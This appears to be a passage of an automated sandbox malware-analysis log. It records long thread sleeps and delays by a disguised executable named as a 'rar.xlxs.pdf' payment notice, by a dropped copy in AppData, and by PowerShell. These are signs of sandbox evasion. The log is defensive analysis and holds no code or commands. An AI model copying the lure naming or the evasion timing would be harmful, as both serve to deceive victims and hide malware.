Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595780
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595561
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595124
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 594789
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 594646
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 594024
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593916
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593719
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593609
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593470
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593356
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593249

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8621	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 929	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8996	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 539	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Window / User API: threadDelayed 5697	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Window / User API: threadDelayed 4106	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Window / User API: threadDelayed 4305
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Window / User API: threadDelayed 5534

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 6072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6060	Thread sleep count: 8621 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4428	Thread sleep count: 929 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -39660499758475511s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7428	Thread sleep count: 5697 > 30	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -599858s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -599734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7428	Thread sleep count: 4106 > 30	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -599613s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -599474s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -599350s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -599242s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -599138s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -598874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -597853s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -597732s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -597624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -597296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -595873s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -595542s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -595405s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -595275s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -595145s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -594648s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -594218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -594053s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593827s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593497s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -593061s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -592953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -592843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -592731s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -592624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -592515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408	Thread sleep time: -592406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7444	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep count: 41 > 30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7800	Thread sleep count: 4305 > 30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7800	Thread sleep count: 5534 > 30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -598873s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -598750s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -598640s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -598271s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -598065s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -597769s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -597444s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -597324s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -597217s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -597108s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596873s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596218s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -596108s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595998s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595889s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595780s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595561s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595343s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595124s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -594789s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -594646s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -594024s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -593916s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -593719s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -593609s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -593470s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -593356s >= -30000s
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796	Thread sleep time: -593249s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599858	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599734	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599613	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599474	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599350	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599242	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 599138	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597853	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597732	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597624	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595873	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595542	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595405	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595275	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 595145	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594648	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 594053	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593937	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593827	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593718	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593609	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593497	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593390	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593280	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593171	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 593061	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592953	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592843	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592731	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592624	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592515	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Thread delayed: delay time: 592406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598873
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598271
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 598065
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597769
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597444
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597324
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597217
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 597108
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596873
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596546
